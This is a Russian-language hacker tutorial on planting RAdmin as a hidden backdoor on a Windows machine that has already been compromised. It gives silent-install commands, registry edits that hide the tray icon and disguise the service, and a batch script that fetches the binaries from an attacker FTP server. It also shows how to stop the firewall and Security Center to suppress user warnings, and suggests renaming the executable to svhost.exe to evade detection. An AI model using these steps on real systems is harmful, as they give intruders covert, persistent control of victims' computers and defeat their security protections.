0х01. Интро
-----------
Последнее время участились просьбы на форумах о помощи закрепиться на Windows-машинах,
да и в ICQ почему-то спрашивают вопросы именно такого рода...и именно про RAdmin. Поэтому,
чтобы не обьяснять каждому что к чему, я решил об этом написать...
Итак... Совершенно не важно как вы получили доступ к машине с ОС Windows (локально или
удалённым сплойтом), важно что у вас есть потребность в последующем использовать ресурсы
и/или данные этой машины. Способов оставить себе лазеёку множество... от бинда порта до
установки троянов. Один из многих - это установка RAdmin. Приступим.
0х02. Теория
------------
Да-да... именно теория, так как выяснилось что многие люди незнают коммандной оболочки
и что такое *.bat-файлы. Из данной области надо хотя бы знать как пользоваться FTP через
cmd.exe =) Придумывать ничего не надо, вот хэлп:
Синтаксис:
ftp [-v] [-d] [-i] [-n] [-g] [-s:имя_файла] [-a] [-w:размер] [-A] [Ведомый компьютер]
... из параметров нам понадобится только:
-v = Запрещает вывод на экран ответа FTP-сервера;
-n = Запрещает автоматический вход в систему в ходе начального подключения;
-s:имя_файла = Указывает текстовый файл с ftp-командами.
Эти команды выполняются автоматически после запуска команды ftp. ;
Также советую почитать справку по коммандам - REG ADD, netsh firewall, net stop/start, чтобы
хотябы понимать, что мы будем делать далее...
0х03. Процесс установки
-----------------------
Пользоваться будем RAdmin'ом 2.1 Из все кучи файлов нам нужны только:
r_server.exe, AdmDll.dll, raddrv.dll. Вот что написано в хэлпе:
Usage: r_server.exe options
Options:
/setup - show window dialog box with setup settings (install,remove,port,pass)
/pass:xxxxx - specify a password
/port:xxxxx - specify a port number
/install - install service (Win95/98 or WinNT) and driver (WinNT)
/uninstall - uninstall service and driver, if present
/save - save pass & port to the defau lt program settings in the registry if you not
specify port or\and pass when use this option, default port or\and empty
password will be saved.
/silence - dont show message boxes,in /install, /uninstall or /save commands.
/unregister - delete an already entered key for Radmin.
/? - this help screen
Note, that port and password specified in the command prompt,
always overrides default settings from the registry.
Отсюда видно, что для установки RAdmin'a в коммандной строке необходимо набрать:
CMD>r_server.exe /install /silence
CMD>r_server.exe /port:порт /pass:пароль /save /silence
Всё... RAdmin установлен и его можно использовать. НО! На данном этапе он слишком заметен
из-за иконки в трэе. Для того чтобы её убрать необходимо добавить в реестр несколько
ключей:
В [HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters] - ключ "DisableTrayIcon", тип - REG_BINARY,
значение - 00000001.
В [HKLM\SYSTEM\CurrentControlSet\Services\r_server] - ключ "DisplayName", тип - REG_SZ,
значение - "Service Host Controller".
Сделать это можно коммандами:
CMD>REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
CMD>REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
0х04. Автоматизация
-------------------
Всё это, конечно, хорошо, но занимает некоторое время. Поэтому было бы неплохо,
сократить количество действий. Для этого напишем *.bat-файл примерно такого содержания:
@echo off
echo open [Adress_FTP]>ra.pif // [Adress_FTP] - адресс FTP-сервера
echo [user] [pass] a>>ra.pif // [user] - логин, [pass] - пароль
echo binary>>ra.pif
echo GET AdmDll.dll [Path]\AdmDll.dll>>ra.pif //
echo GET raddrv.dll [Path]\raddrv.dll>>ra.pif // [Path] - путь к файлам
echo GET r_server.exe [Path]\r_server.exe>>ra.pif //
echo bye>>ra.pif
ftp -v -n -s:ra.pif
c:\windows\r_server.exe /install /silence
c:\windows\r_server.exe /pass:123 /save /silence
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
c:\windows\r_server.exe /stop
c:\windows\r_server.exe /start
0х05. Утилизация файрвола
-------------------------
Часто бывает так, что на машине включён фаерволл (пусть даже стандартный) и он нам
мешает. В случае с Windows у нас есть 2 пути: отключть его либо добавить необходимые
правила. Рассмотрим каждый из них в отдельности.
Итак, как же отключить стандартный фаерволл? В ОС Windows фаерволом является - служба
"Брандмауэр Windows/Общий доступ к Интернету (ICS)" или по-простому - sharedaccess.
Останавливается он командой:
CMD>NET STOP "Брандмауэр Windows/Общий доступ к Интернету (ICS)"
либо
CMD>NET STOP sharedaccess
но тут есть свои нюансы... при попытке отключения этой службы - пользователь получит
сообщение с предупреждением о небезопасности этого действия. Это неприемлемо! Следовательно
нужно сделать так чтобы этого не произошло. За выдачу таких сообщений отвечает служба
"Центр обеспечения безопасности" (по-простому - wscsvc). С ледовательно перед отключением фаера, необходимо отключить эту службу одной из двух
комманд:
CMD>NET STOP "Центр обеспечения безопасности"
либо
CMD>NET STOP wscsvc
Теперь перейдём к более элегантному методу - добавлению необходимого правила для фаера.
В Win XP SP2 модифицировать и добавлять правила можно коммандой netsh firewall. Вот небольшая справка:
Группа |
Команда |
Описание |
Добавление конфигурации
|
netsh firewall add allowedprogram netsh firewall add portopening |
Добавление разрешенной программы в брандмауэр Windows. Добавление конфигурации порта в
брандмауэр Windows |
Удаление
|
netsh firewall delete allowedprogram netsh firewall delete portopening |
Удаление разрешенной конфигурации
программы из брандмауэра Windows Удаление конфигурации порта из
брандмауэра Windows |
добавить правило можно одной коммандой:
CMD>netsh firewall add allowedprogram C:\Progra~1\Radmin\r_server.exe systerm enable
либо
CMD>netsh firewall add portopening TCP 4899 systerm
где systerm - просто назване правила.
Если же на машине установлен не SP2, то придётся поработать добавляя нужные ключи к реестру
уже знакомой коммандой REG ADD.
Каким бы способом вы не отключали брандмауэр - удобнее дописать все необходимые комманды в
уже созданый в *.bat-файл...
0х06. Ауттро
------------
Несмотря на лёгкость и элегантность этого метода, у него всё же есть несколько минусов,
а именно:
- открытый порт 4899. Спрятать средствами RAdmin'a его нельзя. Можно только поменять,
добавив при установке ключ /port:[порт];
- Добавляется новый сервис (служба);
- Добавляются записи в реестр;
- Заметен для антивирусов;
- Светиться в процессах. Устраняется путём переименовывания exe-шника во что-нибуть неприметное,
например - svhost.exe =)
- некоторые комманды доступны только в WinXP SP2.
0х07. Ссылки
------------
- http://www.cyberlords.net - Оригинал статьи
- http://www.cyberlords.net/... - сканер радмин серверов с пустым паролем
- http://www.blacklog... - Анализ системы удаленного контроля NTRootKit, E-Zine FH0, 0x01
- http://www.famatech.com/support/faq.php - FAQ, офф-сайт RAdmin'a
- http://www.radmin.com - офф-сайт RAdmin'a
- http://www.rootkit.com
- http://www.ucl.ac.uk/cert/win_intrusion.pdf
- http://www1.umn....ts.pdf - презентация с конференции Defcon
- http://www.windowsecurity.c...nment.html
|